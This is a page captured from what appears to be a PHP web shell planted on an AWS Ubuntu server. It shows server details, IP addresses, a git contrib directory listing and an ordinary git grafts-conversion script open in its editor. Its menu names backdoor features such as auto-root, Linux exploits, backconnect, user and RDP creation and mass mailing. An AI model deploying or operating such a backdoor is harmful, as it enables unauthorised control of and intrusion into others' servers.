Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.15.42.61
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
git /
contrib /
[ HOME SHELL ]
Name
Size
Permission
Action
buildsystems
[ DIR ]
drwxr-xr-x
coccinelle
[ DIR ]
drwxr-xr-x
contacts
[ DIR ]
drwxr-xr-x
credential
[ DIR ]
drwxr-xr-x
diff-highlight
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
fast-import
[ DIR ]
drwxr-xr-x
git-jump
[ DIR ]
drwxr-xr-x
git-shell-commands
[ DIR ]
drwxr-xr-x
hg-to-git
[ DIR ]
drwxr-xr-x
hooks
[ DIR ]
drwxr-xr-x
long-running-filter
[ DIR ]
drwxr-xr-x
persistent-https
[ DIR ]
drwxr-xr-x
remote-helpers
[ DIR ]
drwxr-xr-x
stats
[ DIR ]
drwxr-xr-x
subtree
[ DIR ]
drwxr-xr-x
svn-fe
[ DIR ]
drwxr-xr-x
thunderbird-patch-inline
[ DIR ]
drwxr-xr-x
update-unicode
[ DIR ]
drwxr-xr-x
workdir
[ DIR ]
drwxr-xr-x
README
2.06
KB
-rw-r--r--
convert-grafts-to-replace-refs...
751
B
-rw-r--r--
git-resurrect.sh
4.29
KB
-rw-r--r--
remotes2config.sh
770
B
-rw-r--r--
rerere-train.sh
1.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : convert-grafts-to-replace-refs.sh
#!/bin/sh # You should execute this script in the repository where you # want to convert grafts to replace refs. GRAFTS_FILE="${GIT_DIR:-.git}/info/grafts" . $(git --exec-path)/git-sh-setup test -f "$GRAFTS_FILE" || die "Could not find graft file: '$GRAFTS_FILE'" grep '^[^# ]' "$GRAFTS_FILE" | while read definition do if test -n "$definition" then echo "Converting: $definition" git replace --graft $definition || die "Conversion failed for: $definition" fi done mv "$GRAFTS_FILE" "$GRAFTS_FILE.bak" || die "Could not rename '$GRAFTS_FILE' to '$GRAFTS_FILE.bak'" echo "Success!" echo "All the grafts in '$GRAFTS_FILE' have been converted to replace refs!" echo "The grafts file '$GRAFTS_FILE' has been renamed: '$GRAFTS_FILE.bak'"
Close